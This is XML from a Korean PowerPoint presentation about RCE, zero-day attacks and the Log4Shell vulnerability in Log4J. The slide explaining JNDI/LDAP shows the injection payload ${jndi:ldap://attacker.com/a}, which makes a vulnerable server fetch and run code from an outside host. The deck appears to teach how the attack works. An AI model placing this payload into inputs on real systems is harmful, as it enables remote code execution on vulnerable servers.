              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>디렉터리 서비스를 조회하고 수정하는 응용 프로토콜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="27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E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://attacker.com/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>은 특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>을 실행시키는 명령어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>내용이 코드 실행일 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>이 실행되면서 문제가 발생한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0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8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04"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="53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489</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>53</Paragraphs>
  <Slides>13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HY헤드라인M</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>휴먼엑스포</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>RCE(Remote Code Execution)</vt:lpstr>
      <vt:lpstr>RCE 발생 이전의 공격 방식</vt:lpstr>
      <vt:lpstr>제로데이 공격</vt:lpstr>
      <vt:lpstr>Log4J</vt:lpstr>
      <vt:lpstr>Log4Shell</vt:lpstr>
      <vt:lpstr>Log4Shell</vt:lpstr>
      <vt:lpstr>Log4Shell 공격이 이루어지는 과정</vt:lpstr>
      <vt:lpstr>jndi:ldap</vt:lpstr>
      <vt:lpstr>전체 흐름도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HOME</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-22T10:25:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-31T10:51:14Z</dcterms:modified>
</cp:coreProperties>
</file>